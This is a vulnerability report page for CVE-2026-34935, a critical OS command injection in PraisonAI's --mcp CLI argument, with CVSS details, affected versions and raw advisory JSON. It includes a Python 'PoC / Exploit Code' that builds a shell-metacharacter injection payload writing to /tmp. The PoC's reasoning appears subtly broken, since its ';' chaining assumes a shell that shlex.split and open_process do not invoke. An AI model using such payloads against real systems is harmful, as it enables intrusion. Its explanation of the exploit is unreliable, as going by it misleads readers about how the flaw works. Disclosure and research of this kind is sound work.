Security Vulnerability Report
中文
CVE-2026-34935 CVSS 9.8 CRITICAL

CVE-2026-34935

Published: 2026-04-03 23:17:06
Last Modified: 2026-04-14 18:14:52
Source: [email protected]

Description

PraisonAI is a multi-agent teams system. From version 4.5.15 to before version 4.5.69, the --mcp CLI argument is passed directly to shlex.split() and forwarded through the call chain to anyio.open_process() with no validation, allowlist check, or sanitization at any hop, allowing arbitrary OS command execution as the process user. This issue has been patched in version 4.5.69.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:* - VULNERABLE
PraisonAI >= 4.5.15, < 4.5.69

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-34935 # The application passes the --mcp argument directly to shlex.split() and anyio.open_process(). # By injecting shell metacharacters, we can achieve arbitrary command execution. import subprocess import sys # Simulating the vulnerable CLI call # In a real scenario, this would be executed on the target machine running the vulnerable version. # Example payload: "valid_param; touch /tmp/pwned" # The vulnerability lies in how the input is parsed and executed. # If the app executes: anyio.open_process(shlex.split(user_input)) # and user_input is: "some_arg; malicious_command" payload = "; echo 'CVE-2026-34935 Exploited' > /tmp/poc.txt" vulnerable_command_args = ["praisonai", "--mcp", payload] print(f"[+] Attempting to exploit CVE-2026-34935 with payload: {payload}") print(f"[+] Simulated command: praisonai --mcp '{payload}'") # subprocess.call(vulnerable_command_args) # Uncomment to run locally if vulnerable app exists print("[!] If exploited, a file /tmp/poc.txt would be created on the target.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34935", "sourceIdentifier": "[email protected]", "published": "2026-04-03T23:17:05.693", "lastModified": "2026-04-14T18:14:51.930", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAI is a multi-agent teams system. From version 4.5.15 to before version 4.5.69, the --mcp CLI argument is passed directly to shlex.split() and forwarded through the call chain to anyio.open_process() with no validation, allowlist check, or sanitization at any hop, allowing arbitrary OS command execution as the process user. This issue has been patched in version 4.5.69."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.15", "versionEndExcluding": "4.5.69", "matchCriteriaId": "5FE53D99-2CEE-4ECB-A45E-8F0E5A5A2878"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/commit/47bff65413beaa3c21bf633c1fae4e684348368c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9gm9-c8mq-vq7m", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.